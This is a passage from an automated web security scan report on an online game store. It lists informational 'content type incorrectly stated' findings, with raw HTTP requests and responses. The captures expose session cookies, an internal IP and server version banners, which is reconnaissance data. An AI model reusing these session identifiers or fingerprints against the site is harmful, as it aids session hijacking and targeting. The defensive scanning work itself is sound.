Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253AHOME%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/en_US/buy/ThemeID.718200/productID.208594200%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; expires=Sat, 23-Jun-2012 20:25:25 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=142044525971,0)
Date: Fri, 24 Jun 2011 14:36:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 26163


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926173482:NODE=c2a5301:THREA
...[SNIP]...

5. Content type incorrectly stated  previous
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


5.1. http://store.origin.com/DRHM/Storefront/Site/ea/pb/images/EA_favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://store.origin.com
Path:   /DRHM/Storefront/Site/ea/pb/images/EA_favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /DRHM/Storefront/Site/ea/pb/images/EA_favicon.ico HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 02 Jun 2016 14:40:03 GMT
ETag: "57e-4756dc38"
Content-Type: text/plain
Last-Modified: Wed, 05 Dec 2007 17:13:28 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=17888;ecid=129158849039,0)
Content-Length: 1406
Date: Fri, 03 Jun 2011 08:40:03 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Accept-Ranges: bytes

..............h.......(....... ...........@...........................)''.........776.....bba.........##$.............................................................................................zz
...[SNIP]...

5.2. http://store.origin.com/store  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://store.origin.com
Path:   /store

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /store?Action=DisplayPage&id=ProductFinderLogicPage&Locale=en_US&SiteID=ea&objectID=54552300&option=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=111979717898,0)
Date: Fri, 24 Jun 2011 14:35:37 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 2389


<!-- REQUEST ID: TIME=1308926137372:NODE=c2a5301:THREAD=4065 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=1
...[SNIP]...

Report generated by XSS.CX at Sat Jun 25 09:45:35 CDT 2011.